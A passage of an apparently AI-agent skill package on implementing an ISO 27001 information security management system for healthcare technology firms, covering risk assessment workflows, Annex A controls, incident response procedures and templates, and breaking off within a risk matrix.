Triển khai ISMS ISO 27001 và quản trị an ninh mạng cho HealthTech/MedTech: đánh giá rủi ro, kiểm soát, chứng nhận và audit bảo mật.
---
name: "information-security-manager-iso27001"
description: ISO 27001 ISMS implementation and cybersecurity governance for HealthTech and MedTech companies. Use for ISMS design, security risk assessment, control implementation, ISO 27001 certification, security audits, incident response, and compliance verification. Covers ISO 27001, ISO 27002, healthcare security, and medical device cybersecurity.
---
# Information Security Manager - ISO 27001
Implement and manage Information Security Management Systems (ISMS) aligned with ISO 27001:2022 and healthcare regulatory requirements.
---
## Table of Contents
- [Trigger Phrases](#trigger-phrases)
- [Quick Start](#quick-start)
- [Tools](#tools)
- [Workflows](#workflows)
- [Reference Guides](#reference-guides)
- [Validation Checkpoints](#validation-checkpoints)
---
## Trigger Phrases
Use this skill when you hear:
- "implement ISO 27001"
- "ISMS implementation"
- "security risk assessment"
- "information security policy"
- "ISO 27001 certification"
- "security controls implementation"
- "incident response plan"
- "healthcare data security"
- "medical device cybersecurity"
- "security compliance audit"
---
## Quick Start
### Run Security Risk Assessment
```bash
python scripts/risk_assessment.py --scope "patient-data-system" --output risk_register.json
```
### Check Compliance Status
```bash
python scripts/compliance_checker.py --standard iso27001 --controls-file controls.csv
```
### Generate Gap Analysis Report
```bash
python scripts/compliance_checker.py --standard iso27001 --gap-analysis --output gaps.md
```
---
## Tools
### risk_assessment.py
Automated security risk assessment following ISO 27001 Clause 6.1.2 methodology.
**Usage:**
```bash
# Full risk assessment
python scripts/risk_assessment.py --scope "cloud-infrastructure" --output risks.json
# Healthcare-specific assessment
python scripts/risk_assessment.py --scope "ehr-system" --template healthcare --output risks.json
# Quick asset-based assessment
python scripts/risk_assessment.py --assets assets.csv --output risks.json
```
**Parameters:**
| Parameter | Required | Description |
|-----------|----------|-------------|
| `--scope` | Yes | System or area to assess |
| `--template` | No | Assessment template: `general`, `healthcare`, `cloud` |
| `--assets` | No | CSV file with asset inventory |
| `--output` | No | Output file (default: stdout) |
| `--format` | No | Output format: `json`, `csv`, `markdown` |
**Output:**
- Asset inventory with classification
- Threat and vulnerability mapping
- Risk scores (likelihood × impact)
- Treatment recommendations
- Residual risk calculations
### compliance_checker.py
Verify ISO 27001/27002 control implementation status.
**Usage:**
```bash
# Check all ISO 27001 controls
python scripts/compliance_checker.py --standard iso27001
# Gap analysis with recommendations
python scripts/compliance_checker.py --standard iso27001 --gap-analysis
# Check specific control domains
python scripts/compliance_checker.py --standard iso27001 --domains "access-control,cryptography"
# Export compliance report
python scripts/compliance_checker.py --standard iso27001 --output compliance_report.md
```
**Parameters:**
| Parameter | Required | Description |
|-----------|----------|-------------|
| `--standard` | Yes | Standard to check: `iso27001`, `iso27002`, `hipaa` |
| `--controls-file` | No | CSV with current control status |
| `--gap-analysis` | No | Include remediation recommendations |
| `--domains` | No | Specific control domains to check |
| `--output` | No | Output file path |
**Output:**
- Control implementation status
- Compliance percentage by domain
- Gap analysis with priorities
- Remediation recommendations
---
## Workflows
### Workflow 1: ISMS Implementation
**Step 1: Define Scope and Context**
Document organizational context and ISMS boundaries:
- Identify interested parties and requirements
- Define ISMS scope and boundaries
- Document internal/external issues
**Validation:** Scope statement reviewed and approved by management.
**Step 2: Conduct Risk Assessment**
```bash
python scripts/risk_assessment.py --scope "full-organization" --template general --output initial_risks.json
```
- Identify information assets
- Assess threats and vulnerabilities
- Calculate risk levels
- Determine risk treatment options
**Validation:** Risk register contains all critical assets with assigned owners.
**Step 3: Select and Implement Controls**
Map risks to ISO 27002 controls:
```bash
python scripts/compliance_checker.py --standard iso27002 --gap-analysis --output control_gaps.md
```
Control categories:
- Organizational (policies, roles, responsibilities)
- People (screening, awareness, training)
- Physical (perimeters, equipment, media)
- Technological (access, crypto, network, application)
**Validation:** Statement of Applicability (SoA) documents all controls with justification.
**Step 4: Establish Monitoring**
Define security metrics:
- Incident count and severity trends
- Control effectiveness scores
- Training completion rates
- Audit findings closure rate
**Validation:** Dashboard shows real-time compliance status.
### Workflow 2: Security Risk Assessment
**Step 1: Asset Identification**
Create asset inventory:
| Asset Type | Examples | Classification |
|------------|----------|----------------|
| Information | Patient records, source code | Confidential |
| Software | EHR system, APIs | Critical |
| Hardware | Servers, medical devices | High |
| Services | Cloud hosting, backup | High |
| People | Admin accounts, developers | Varies |
**Validation:** All assets have assigned owners and classifications.
**Step 2: Threat Analysis**
Identify threats per asset category:
| Asset | Threats | Likelihood |
|-------|---------|------------|
| Patient data | Unauthorized access, breach | High |
| Medical devices | Malware, tampering | Medium |
| Cloud services | Misconfiguration, outage | Medium |
| Credentials | Phishing, brute force | High |
**Validation:** Threat model covers top-10 industry threats.
**Step 3: Vulnerability Assessment**
```bash
python scripts/risk_assessment.py --scope "network-infrastructure" --output vuln_risks.json
```
Document vulnerabilities:
- Technical (unpatched systems, weak configs)
- Process (missing procedures, gaps)
- People (lack of training, insider risk)
**Validation:** Vulnerability scan results mapped to risk register.
**Step 4: Risk Evaluation and Treatment**
Calculate risk: `Risk = Likelihood × Impact`
| Risk Level | Score | Treatment |
|------------|-------|-----------|
| Critical | 20-25 | Immediate action required |
| High | 15-19 | Treatment plan within 30 days |
| Medium | 10-14 | Treatment plan within 90 days |
| Low | 5-9 | Accept or monitor |
| Minimal | 1-4 | Accept |
**Validation:** All high/critical risks have approved treatment plans.
### Workflow 3: Incident Response
**Step 1: Detection and Reporting**
Incident categories:
- Security breach (unauthorized access)
- Malware infection
- Data leakage
- System compromise
- Policy violation
**Validation:** Incident logged within 15 minutes of detection.
**Step 2: Triage and Classification**
| Severity | Criteria | Response Time |
|----------|----------|---------------|
| Critical | Data breach, system down | Immediate |
| High | Active threat, significant risk | 1 hour |
| Medium | Contained threat, limited impact | 4 hours |
| Low | Minor violation, no impact | 24 hours |
**Validation:** Severity assigned and escalation triggered if needed.
**Step 3: Containment and Eradication**
Immediate actions:
1. Isolate affected systems
2. Preserve evidence
3. Block threat vectors
4. Remove malicious artifacts
**Validation:** Containment confirmed, no ongoing compromise.
**Step 4: Recovery and Lessons Learned**
Post-incident activities:
1. Restore systems from clean backups
2. Verify integrity before reconnection
3. Document timeline and actions
4. Conduct post-incident review
5. Update controls and procedures
**Validation:** Post-incident report completed within 5 business days.
---
## Reference Guides
### When to Use Each Reference
**references/iso27001-controls.md**
- Control selection for SoA
- Implementation guidance
- Evidence requirements
- Audit preparation
**references/risk-assessment-guide.md**
- Risk methodology selection
- Asset classification criteria
- Threat modeling approaches
- Risk calculation methods
**references/incident-response.md**
- Response procedures
- Escalation matrices
- Communication templates
- Recovery checklists
---
## Validation Checkpoints
### ISMS Implementation Validation
| Phase | Checkpoint | Evidence Required |
|-------|------------|-------------------|
| Scope | Scope approved | Signed scope document |
| Risk | Register complete | Risk register with owners |
| Controls | SoA approved | Statement of Applicability |
| Operation | Metrics active | Dashboard screenshots |
| Audit | Internal audit done | Audit report |
### Certification Readiness
Before Stage 1 audit:
- [ ] ISMS scope documented and approved
- [ ] Information security policy published
- [ ] Risk assessment completed
- [ ] Statement of Applicability finalized
- [ ] Internal audit conducted
- [ ] Management review completed
- [ ] Nonconformities addressed
Before Stage 2 audit:
- [ ] Controls implemented and operational
- [ ] Evidence of effectiveness available
- [ ] Staff trained and aware
- [ ] Incidents logged and managed
- [ ] Metrics collected for 3+ months
### Compliance Verification
Run periodic checks:
```bash
# Monthly compliance check
python scripts/compliance_checker.py --standard iso27001 --output monthly_$(date +%Y%m).md
# Quarterly gap analysis
python scripts/compliance_checker.py --standard iso27001 --gap-analysis --output quarterly_gaps.md
```
---
## Worked Example: Healthcare Risk Assessment
**Scenario:** Assess security risks for a patient data management system.
### Step 1: Define Assets
```bash
python scripts/risk_assessment.py --scope "patient-data-system" --template healthcare
```
**Asset inventory output:**
| Asset ID | Asset | Type | Owner | Classification |
|----------|-------|------|-------|----------------|
| A001 | Patient database | Information | DBA Team | Confidential |
| A002 | EHR application | Software | App Team | Critical |
| A003 | Database server | Hardware | Infra Team | High |
| A004 | Admin credentials | Access | Security | Critical |
### Step 2: Identify Risks
**Risk register output:**
| Risk ID | Asset | Threat | Vulnerability | L | I | Score |
|---------|-------|--------|---------------|---|---|-------|
| R001 | A001 | Data breach | Weak encryption | 3 | 5 | 15 |
| R002 | A002 | SQL injection | Input validation | 4 | 4 | 16 |
| R003 | A004 | Credential theft | No MFA | 4 | 5 | 20 |
### Step 3: Determine Treatment
| Risk | Treatment | Control | Timeline |
|------|-----------|---------|----------|
| R001 | Mitigate | Implement AES-256 encryption | 30 days |
| R002 | Mitigate | Add input validation, WAF | 14 days |
| R003 | Mitigate | Enforce MFA for all admins | 7 days |
### Step 4: Verify Implementation
```bash
python scripts/compliance_checker.py --controls-file implemented_controls.csv
```
**Verification output:**
```
Control Implementation Status
=============================
Cryptography (A.8.24): IMPLEMENTED
- AES-256 at rest: YES
- TLS 1.3 in transit: YES
Access Control (A.8.5): IMPLEMENTED
- MFA enabled: YES
- Admin accounts: 100% coverage
Application Security (A.8.26): PARTIAL
- Input validation: YES
- WAF deployed: PENDING
Overall Compliance: 87%
```
FILE:references/incident-response.md
# Incident Response Procedures
Security incident detection, response, and recovery procedures per ISO 27001 requirements.
---
## Table of Contents
- [Incident Classification](#incident-classification)
- [Response Procedures](#response-procedures)
- [Escalation Matrix](#escalation-matrix)
- [Communication Templates](#communication-templates)
- [Recovery Checklists](#recovery-checklists)
- [Post-Incident Activities](#post-incident-activities)
---
## Incident Classification
### Incident Categories
| Category | Description | Examples |
|----------|-------------|----------|
| Security Breach | Unauthorized access to systems/data | Account compromise, data exfiltration |
| Malware | Malicious software infection | Ransomware, virus, trojan |
| Data Leakage | Unauthorized data disclosure | Accidental email, misconfigured storage |
| Denial of Service | Service availability impact | DDoS attack, resource exhaustion |
| Policy Violation | Security policy breach | Unauthorized software, data handling |
| Physical | Physical security incident | Theft, unauthorized entry |
### Severity Levels
| Level | Criteria | Response Time | Examples |
|-------|----------|---------------|----------|
| **Critical (P1)** | Active breach, data loss, system down | Immediate (15 min) | Ransomware, confirmed breach |
| **High (P2)** | Active threat, potential data exposure | 1 hour | Malware detected, suspicious access |
| **Medium (P3)** | Contained threat, limited impact | 4 hours | Failed attacks, policy violations |
| **Low (P4)** | Minor issue, no immediate risk | 24 hours | Suspicious emails, minor violations |
### Severity Decision Tree
```
Is there active data loss or system compromise?
├── Yes → CRITICAL (P1)
└── No → Is there an active uncontained threat?
├── Yes → HIGH (P2)
└── No → Is there potential for data exposure?
├── Yes → MEDIUM (P3)
└── No → LOW (P4)
```
---
## Response Procedures
### Phase 1: Detection and Reporting
**Objective:** Identify and report security incidents promptly.
**Steps:**
1. Identify potential incident through monitoring, alerts, or reports
2. Document initial observations (time, systems, symptoms)
3. Report to Security Team via designated channel
4. Assign incident ID and log in tracking system
**Validation:** Incident logged within 15 minutes of detection.
**Documentation Required:**
- Date/time of detection
- Detection source (monitoring, user report, automated alert)
- Affected systems/users (initial assessment)
- Reporter information
### Phase 2: Triage and Assessment
**Objective:** Determine incident scope and severity.
**Steps:**
1. Gather additional information (logs, system state)
2. Determine incident category and severity
3. Identify affected assets and potential impact
4. Assign incident owner and response team
**Validation:** Severity assigned and escalation triggered if needed.
**Assessment Checklist:**
- [ ] Systems affected identified
- [ ] Data types potentially impacted
- [ ] Attack vector determined
- [ ] Scope (single system vs. widespread)
- [ ] Business impact assessed
### Phase 3: Containment
**Objective:** Limit damage and prevent spread.
**Immediate Containment (Short-term):**
1. Isolate affected systems from network
2. Disable compromised accounts
3. Block malicious IPs/domains
4. Preserve evidence before changes
**Long-term Containment:**
1. Apply temporary fixes
2. Implement additional monitoring
3. Strengthen access controls
4. Prepare for eradication
**Validation:** Containment confirmed, no ongoing spread.
**Containment Actions by Incident Type:**
| Incident Type | Containment Actions |
|---------------|---------------------|
| Account Compromise | Disable account, revoke sessions, reset credentials |
| Malware | Isolate host, block C2 domains, scan related systems |
| Data Breach | Block exfiltration path, revoke access, enable DLP |
| DDoS | Enable DDoS protection, rate limiting, traffic scrubbing |
### Phase 4: Eradication
**Objective:** Remove threat from environment.
**Steps:**
1. Identify root cause
2. Remove malware/backdoors
3. Close vulnerabilities exploited
4. Reset compromised credentials
5. Verify threat elimination
**Validation:** No indicators of compromise remain.
**Eradication Checklist:**
- [ ] Malware removed from all systems
- [ ] Vulnerabilities patched
- [ ] Backdoors/persistence removed
- [ ] Compromised credentials rotated
- [ ] Security gaps closed
### Phase 5: Recovery
**Objective:** Restore systems to normal operation.
**Steps:**
1. Restore from clean backups if needed
2. Rebuild compromised systems
3. Verify system integrity
4. Monitor for re-infection
5. Return to production gradually
**Validation:** Systems operational with enhanced monitoring.
**Recovery Checklist:**
- [ ] Systems restored to known-good state
- [ ] Integrity verification completed
- [ ] Enhanced monitoring in place
- [ ] Business operations resumed
- [ ] User access restored (verified accounts only)
### Phase 6: Lessons Learned
**Objective:** Improve security posture and response capability.
**Steps:**
1. Conduct post-incident review (within 5 business days)
2. Document timeline and actions taken
3. Identify what worked and what didn't
4. Update procedures and controls
5. Share relevant findings (internally, externally if required)
**Validation:** Post-incident report completed and actions tracked.
---
## Escalation Matrix
### Escalation Paths
| Severity | Initial Response | 1 Hour | 4 Hours | 24 Hours |
|----------|------------------|--------|---------|----------|
| Critical | Security Team | CISO + Management | Executive Team | Board notification |
| High | Security Team | CISO | Management | - |
| Medium | Security Team | Security Manager | CISO if unresolved | - |
| Low | Security Analyst | Security Team Lead | - | - |
### Contact Information (Template)
| Role | Primary | Backup | Contact Method |
|------|---------|--------|----------------|
| Security On-Call | [Name] | [Name] | Phone, Slack |
| CISO | [Name] | [Name] | Phone, Email |
| IT Director | [Name] | [Name] | Phone, Email |
| Legal Counsel | [Name] | [Firm] | Phone |
| PR/Communications | [Name] | [Name] | Phone |
| Executive Sponsor | [Name] | [Name] | Phone |
### External Notifications
| Condition | Notify | Timeline |
|-----------|--------|----------|
| Patient data breach | HHS (HIPAA) | 60 days |
| EU personal data breach | Supervisory Authority (GDPR) | 72 hours |
| Significant breach | Law enforcement | As appropriate |
| Third-party involved | Affected vendor | Immediately |
---
## Communication Templates
### Internal Notification (Initial)
```
Subject: [SEVERITY] Security Incident - [Brief Description]
INCIDENT SUMMARY
----------------
Incident ID: INC-[YYYY]-[###]
Detected: [Date/Time]
Severity: [Critical/High/Medium/Low]
Status: [Investigating/Contained/Resolved]
WHAT HAPPENED
[Brief description of the incident]
CURRENT IMPACT
[Systems affected, business impact]
ACTIONS BEING TAKEN
[Current response activities]
WHAT YOU NEED TO DO
[Any required user actions]
NEXT UPDATE
Expected by: [Time]
Contact: Security Team - [contact info]
```
### External Notification (Breach)
```
Subject: Important Security Notice from [Organization]
Dear [Affected Party],
We are writing to inform you of a security incident that may have
involved your personal information.
WHAT HAPPENED
On [date], we discovered [brief description].
WHAT INFORMATION WAS INVOLVED
[Types of data potentially affected]
WHAT WE ARE DOING
[Actions taken to address the incident]
WHAT YOU CAN DO
[Recommended protective actions]
FOR MORE INFORMATION
[Contact information, resources]
We sincerely regret any concern this may cause and are committed
to protecting your information.
[Signature]
```
### Status Update
```
Subject: UPDATE: Security Incident INC-[ID] - [Status]
CURRENT STATUS
--------------
Status: [Contained/Eradicating/Recovering]
Last Update: [Time]
PROGRESS SINCE LAST UPDATE
[Actions completed]
CURRENT ACTIVITIES
[Ongoing response work]
REMAINING ACTIONS
[What still needs to be done]
ESTIMATED RESOLUTION
[Timeframe if known]
NEXT UPDATE
Expected: [Time]
```
---
## Recovery Checklists
### System Recovery Checklist
- [ ] Verify backup integrity before restoration
- [ ] Restore to isolated environment first
- [ ] Scan restored systems for malware
- [ ] Apply all security patches
- [ ] Reset all credentials on system
- [ ] Review and harden configurations
- [ ] Verify application functionality
- [ ] Enable enhanced logging/monitoring
- [ ] Conduct security scan before production
- [ ] Document recovery steps taken
### Account Compromise Recovery
- [ ] Disable compromised account
- [ ] Revoke all active sessions
- [ ] Reset password with strong credential
- [ ] Enable MFA if not already
- [ ] Review account activity logs
- [ ] Check for unauthorized changes
- [ ] Review connected applications
- [ ] Verify account recovery options
- [ ] Notify account owner securely
- [ ] Monitor for suspicious activity
### Ransomware Recovery
- [ ] Isolate affected systems immediately
- [ ] Identify ransomware variant
- [ ] Check for decryption tools available
- [ ] Assess backup availability/integrity
- [ ] Report to law enforcement
- [ ] Document encrypted files/systems
- [ ] Restore from clean backups
- [ ] Rebuild systems that cannot be restored
- [ ] Patch vulnerability exploited
- [ ] Implement additional controls
---
## Post-Incident Activities
### Post-Incident Review Meeting
**Timing:** Within 5 business days of resolution
**Attendees:**
- Incident response team
- Affected system owners
- Security management
- Relevant stakeholders
**Agenda:**
1. Incident timeline review
2. What worked well
3. What could be improved
4. Root cause analysis
5. Preventive measures
6. Action items and owners
### Post-Incident Report Template
```
INCIDENT POST-MORTEM REPORT
===========================
Incident ID: INC-[YYYY]-[###]
Date: [Report date]
Author: [Name]
Classification: [Internal/Confidential]
EXECUTIVE SUMMARY
[2-3 paragraph summary]
INCIDENT TIMELINE
[Detailed chronological events]
ROOT CAUSE ANALYSIS
[5 Whys or similar analysis]
IMPACT ASSESSMENT
- Systems affected: [list]
- Data impacted: [description]
- Business impact: [description]
- Financial impact: [estimate if known]
RESPONSE EFFECTIVENESS
What worked well:
- [item]
- [item]
Areas for improvement:
- [item]
- [item]
RECOMMENDATIONS
| # | Recommendation | Priority | Owner | Due Date |
|---|----------------|----------|-------|----------|
| 1 | [action] | High | [name] | [date] |
| 2 | [action] | Medium | [name] | [date] |
LESSONS LEARNED
[Key takeaways for future incidents]
APPENDICES
- Detailed logs
- Evidence inventory
- Communication records
```
### Metrics to Track
| Metric | Target | Purpose |
|--------|--------|---------|
| Mean Time to Detect (MTTD) | < 1 hour | Detection capability |
| Mean Time to Respond (MTTR) | < 4 hours | Response speed |
| Mean Time to Contain (MTTC) | < 2 hours | Containment effectiveness |
| Incidents by severity | Decreasing trend | Overall security posture |
| Repeat incidents | 0 | Root cause resolution |
FILE:references/iso27001-controls.md
# ISO 27001:2022 Controls Implementation Guide
Implementation guidance for Annex A controls with evidence requirements and audit preparation.
---
## Table of Contents
- [Control Categories Overview](#control-categories-overview)
- [Organizational Controls (A.5)](#organizational-controls-a5)
- [People Controls (A.6)](#people-controls-a6)
- [Physical Controls (A.7)](#physical-controls-a7)
- [Technological Controls (A.8)](#technological-controls-a8)
- [Evidence Requirements](#evidence-requirements)
- [Statement of Applicability](#statement-of-applicability)
---
## Control Categories Overview
ISO 27001:2022 Annex A contains 93 controls across 4 categories:
| Category | Controls | Focus Areas |
|----------|----------|-------------|
| Organizational (A.5) | 37 | Policies, governance, supplier management |
| People (A.6) | 8 | HR security, awareness, remote working |
| Physical (A.7) | 14 | Perimeters, equipment, environment |
| Technological (A.8) | 34 | Access, crypto, network, development |
---
## Organizational Controls (A.5)
### A.5.1 - Policies for Information Security
**Requirement:** Define, approve, publish, and communicate information security policies.
**Implementation:**
1. Draft information security policy covering scope, objectives, principles
2. Obtain management approval signature
3. Communicate to all employees and relevant parties
4. Review annually or after significant changes
**Evidence:**
- Signed policy document
- Communication records (email, intranet)
- Acknowledgment records
- Review meeting minutes
### A.5.2 - Information Security Roles and Responsibilities
**Requirement:** Define and allocate information security responsibilities.
**Implementation:**
1. Create RACI matrix for security activities
2. Appoint Information Security Manager
3. Define responsibilities in job descriptions
4. Establish reporting lines
**Evidence:**
- RACI matrix document
- ISM appointment letter
- Job descriptions with security duties
- Organizational chart
### A.5.9 - Inventory of Information and Assets
**Requirement:** Identify and maintain inventory of information assets.
**Implementation:**
1. Create asset register with classification
2. Assign owners for each asset
3. Define acceptable use rules
4. Review quarterly
**Evidence:**
- Asset inventory/register
- Classification scheme
- Owner assignment records
- Review logs
### A.5.15 - Access Control
**Requirement:** Establish and implement rules for controlling access.
**Implementation:**
1. Document access control policy
2. Implement role-based access control (RBAC)
3. Define access provisioning/deprovisioning process
4. Conduct access reviews quarterly
**Evidence:**
- Access control policy
- RBAC role definitions
- Access request forms
- Review reports
---
## People Controls (A.6)
### A.6.1 - Screening
**Requirement:** Verify backgrounds of candidates prior to employment.
**Implementation:**
1. Define screening requirements by role
2. Conduct background checks
3. Verify references and qualifications
4. Document screening results
**Evidence:**
- Screening policy
- Background check reports
- Verification records
- Consent forms
### A.6.3 - Information Security Awareness and Training
**Requirement:** Ensure personnel receive appropriate awareness and training.
**Implementation:**
1. Develop annual training program
2. Include role-specific training
3. Conduct phishing simulations
4. Track completion and effectiveness
**Evidence:**
- Training materials
- Completion records
- Test/quiz results
- Phishing simulation reports
### A.6.7 - Remote Working
**Requirement:** Implement security measures for remote working.
**Implementation:**
1. Establish remote working policy
2. Require VPN for network access
3. Mandate endpoint protection
4. Secure home network guidance
**Evidence:**
- Remote working policy
- VPN configuration records
- Endpoint compliance reports
- User acknowledgments
---
## Physical Controls (A.7)
### A.7.1 - Physical Security Perimeters
**Requirement:** Define and use security perimeters to protect information.
**Implementation:**
1. Define secure areas and boundaries
2. Implement access controls (badges, locks)
3. Monitor entry points
4. Maintain visitor logs
**Evidence:**
- Site security plan
- Access control system records
- CCTV footage retention
- Visitor logs
### A.7.4 - Physical Security Monitoring
**Requirement:** Monitor premises continuously for unauthorized access.
**Implementation:**
1. Deploy CCTV coverage
2. Implement intrusion detection
3. Define monitoring procedures
4. Establish incident response
**Evidence:**
- CCTV deployment records
- Monitoring procedures
- Alert configurations
- Incident logs
---
## Technological Controls (A.8)
### A.8.2 - Privileged Access Rights
**Requirement:** Restrict and manage privileged access.
**Implementation:**
1. Implement privileged access management (PAM)
2. Enforce separate admin accounts
3. Require MFA for privileged access
4. Monitor and log privileged activities
**Evidence:**
- PAM solution records
- Admin account inventory
- MFA enforcement reports
- Privileged activity logs
### A.8.5 - Secure Authentication
**Requirement:** Implement secure authentication mechanisms.
**Implementation:**
1. Enforce strong password policy
2. Implement MFA for all users
3. Use secure authentication protocols
4. Monitor authentication events
**Evidence:**
- Password policy
- MFA enrollment records
- Authentication configuration
- Failed login reports
### A.8.7 - Protection Against Malware
**Requirement:** Implement detection, prevention, and recovery for malware.
**Implementation:**
1. Deploy endpoint protection on all devices
2. Configure automatic updates
3. Implement email filtering
4. Define malware incident response
**Evidence:**
- Endpoint protection deployment
- Update/patch status
- Email filter configuration
- Malware incident records
### A.8.8 - Management of Technical Vulnerabilities
**Requirement:** Identify and address technical vulnerabilities.
**Implementation:**
1. Conduct regular vulnerability scans
2. Define remediation SLAs by severity
3. Track remediation progress
4. Verify patches applied
**Evidence:**
- Vulnerability scan reports
- Remediation tracking
- Patch deployment records
- Penetration test reports
### A.8.13 - Information Backup
**Requirement:** Maintain and test backup copies of information.
**Implementation:**
1. Define backup policy (frequency, retention)
2. Implement automated backups
3. Encrypt backup data
4. Test restoration regularly
**Evidence:**
- Backup policy
- Backup job logs
- Encryption configuration
- Restoration test records
### A.8.15 - Logging
**Requirement:** Produce, retain, and protect logs of activities.
**Implementation:**
1. Define logging requirements
2. Deploy centralized log management (SIEM)
3. Set retention periods per compliance
4. Protect log integrity
**Evidence:**
- Logging policy
- SIEM configuration
- Log retention settings
- Access controls on logs
### A.8.24 - Use of Cryptography
**Requirement:** Define and implement cryptographic controls.
**Implementation:**
1. Document cryptography policy
2. Encrypt data at rest (AES-256)
3. Encrypt data in transit (TLS 1.3)
4. Manage keys securely
**Evidence:**
- Cryptography policy
- Encryption configuration
- Certificate inventory
- Key management procedures
---
## Evidence Requirements
### Document Evidence
| Control Area | Required Documents |
|-------------|-------------------|
| Policies | Approved policy documents |
| Procedures | Documented processes with version control |
| Records | Completed forms, logs, reports |
| Contracts | Signed agreements with security clauses |
### Technical Evidence
| Control Area | Required Evidence |
|-------------|------------------|
| Access Control | System configurations, access lists |
| Logging | SIEM dashboards, sample logs |
| Encryption | Configuration screenshots, certificate details |
| Vulnerability | Scan reports, remediation tracking |
### Retention Requirements
| Evidence Type | Minimum Retention |
|--------------|-------------------|
| Policies | Current + 2 previous versions |
| Audit reports | 3 years |
| Access logs | 1 year minimum |
| Incident records | 3 years |
| Training records | Duration of employment + 2 years |
---
## Statement of Applicability
### SoA Structure
For each Annex A control, document:
| Field | Description |
|-------|-------------|
| Control ID | A.5.1, A.8.24, etc. |
| Control Name | Official control title |
| Applicable | Yes/No |
| Justification | Why applicable or not |
| Implementation Status | Implemented, Partial, Planned, N/A |
| Implementation Description | How control is implemented |
| Evidence Reference | Links to evidence |
### Sample SoA Entry
```
Control: A.8.5 - Secure Authentication
Applicable: Yes
Justification: Required for all user and system access to protect
information assets from unauthorized access.
Implementation Status: Implemented
Implementation Description:
- MFA enforced for all user accounts via Azure AD
- Admin accounts require hardware token
- Password policy: 12+ chars, complexity, 90-day rotation
- Failed login lockout after 5 attempts
Evidence:
- Azure AD MFA configuration (screenshot)
- Password policy document (DOC-SEC-015)
- Authentication audit logs (SIEM dashboard)
```
### Exclusion Justification Examples
| Control | Justification for Exclusion |
|---------|---------------------------|
| A.7.x (Physical) | Cloud-only operations, no physical facilities |
| A.8.19 (Software) | No user-installed software permitted |
| A.8.23 (Web filter) | Handled by cloud proxy service |
FILE:references/risk-assessment-guide.md
# Risk Assessment Methodology Guide
Comprehensive guidance for conducting information security risk assessments per ISO 27001 Clause 6.1.2.
---
## Table of Contents
- [Risk Assessment Process](#risk-assessment-process)
- [Asset Identification](#asset-identification)
- [Threat Analysis](#threat-analysis)
- [Vulnerability Assessment](#vulnerability-assessment)
- [Risk Calculation](#risk-calculation)
- [Risk Treatment](#risk-treatment)
- [Templates and Tools](#templates-and-tools)
---
## Risk Assessment Process
### ISO 27001 Requirements (Clause 6.1.2)
The organization shall:
1. Define risk assessment process
2. Establish risk criteria (acceptance, assessment)
3. Identify information security risks
4. Analyze and evaluate risks
5. Ensure repeatable and consistent results
### Process Overview
```
1. Context → 2. Asset ID → 3. Threat ID → 4. Vuln ID → 5. Risk Calc → 6. Treatment
↑ |
└──────────────────── Review & Update ←───────────────────────────────┘
```
---
## Asset Identification
### Asset Categories
| Category | Examples | Typical Classification |
|----------|----------|----------------------|
| Information | Patient records, source code, contracts | Confidential-Critical |
| Software | EHR systems, databases, custom apps | High-Critical |
| Hardware | Servers, medical devices, network gear | High |
| Services | Cloud hosting, backup, email | High |
| People | Admin accounts, key personnel | Critical |
| Intangibles | Reputation, intellectual property | High |
### Classification Scheme
| Level | Definition | Impact if Compromised |
|-------|------------|----------------------|
| Critical | Business-critical, regulated data | Severe - regulatory fines, safety risk |
| High | Important business data | Significant - major disruption |
| Medium | Internal business data | Moderate - operational impact |
| Low | Non-sensitive data | Minor - limited impact |
| Public | Intended for public release | Minimal - no impact |
### Asset Inventory Template
| ID | Asset Name | Type | Owner | Location | Classification | Value |
|----|------------|------|-------|----------|----------------|-------|
| A001 | Patient DB | Information | DBA Lead | AWS RDS | Critical | $5M |
| A002 | EHR App | Software | App Team | AWS ECS | Critical | $2M |
| A003 | Admin Creds | Access | Security | Vault | Critical | N/A |
---
## Threat Analysis
### Healthcare Threat Landscape
| Threat | Likelihood | Target Assets | Motivation |
|--------|------------|---------------|------------|
| Ransomware | High | All systems | Financial |
| Data breach | High | Patient data | Financial/Competitive |
| Phishing | Very High | User accounts | Access |
| Insider threat | Medium | Sensitive data | Various |
| DDoS | Medium | Public services | Disruption |
| Supply chain | Medium | Third-party systems | Access |
### Threat Modeling Approaches
**STRIDE Model:**
- **S**poofing identity
- **T**ampering with data
- **R**epudiation
- **I**nformation disclosure
- **D**enial of service
- **E**levation of privilege
**Threat Actor Categories:**
| Actor | Capability | Motivation | Typical Targets |
|-------|-----------|------------|-----------------|
| Nation-state | Very High | Espionage, disruption | Critical infrastructure |
| Organized crime | High | Financial gain | Healthcare, finance |
| Hacktivists | Medium | Ideology | Public-facing systems |
| Insiders | Varies | Financial, revenge | Sensitive data |
| Script kiddies | Low | Notoriety | Unpatched systems |
---
## Vulnerability Assessment
### Vulnerability Categories
| Category | Examples | Detection Method |
|----------|----------|------------------|
| Technical | Unpatched software, weak configs | Vulnerability scans |
| Process | Missing procedures, gaps | Process audits |
| People | Lack of training, social engineering | Phishing tests |
| Physical | Inadequate access controls | Physical audits |
### Vulnerability Scoring (CVSS Alignment)
| Score Range | Severity | Example |
|-------------|----------|---------|
| 9.0-10.0 | Critical | RCE without authentication |
| 7.0-8.9 | High | Authentication bypass |
| 4.0-6.9 | Medium | Information disclosure |
| 0.1-3.9 | Low | Minor configuration issue |
### Vulnerability Sources
1. **Automated Scans:** Nessus, Qualys, OpenVAS
2. **Penetration Testing:** Annual third-party tests
3. **Code Analysis:** SAST/DAST tools
4. **Configuration Audits:** CIS benchmarks
5. **Threat Intelligence:** CVE feeds, vendor advisories
---
## Risk Calculation
### Risk Formula
```
Risk = Likelihood × Impact
```
### Likelihood Scale (1-5)
| Score | Likelihood | Definition |
|-------|-----------|------------|
| 5 | Almost Certain | Expected to occur multiple times per year |
| 4 | Likely | Expected to occur at least once per year |
| 3 | Possible | Could occur within 2-3 years |
| 2 | Unlikely | Could occur within 5 years |
| 1 | Rare | Unlikely to occur |
### Impact Scale (1-5)
| Score | Impact | Financial | Operational | Reputational |
|-------|--------|-----------|-------------|--------------|
| 5 | Catastrophic | >$10M | Total shutdown | International news |
| 4 | Major | $1M-$10M | Major disruption | National news |
| 3 | Moderate | $100K-$1M | Significant impact | Local news |
| 2 | Minor | $10K-$100K | Minor disruption | Complaints |
| 1 | Negligible | <$10K | Minimal impact | Internal only |
### Risk Matrix
| | Impact 1 | Impact 2 | Impact 3 | Impact 4 | Impact 5 |
|-----|----------|----------|----------|----------|----------|
| **L5** | 5 (Low) | 10 (Med) | 15 (High) | 20 (Crit) | 25 (Crit) |
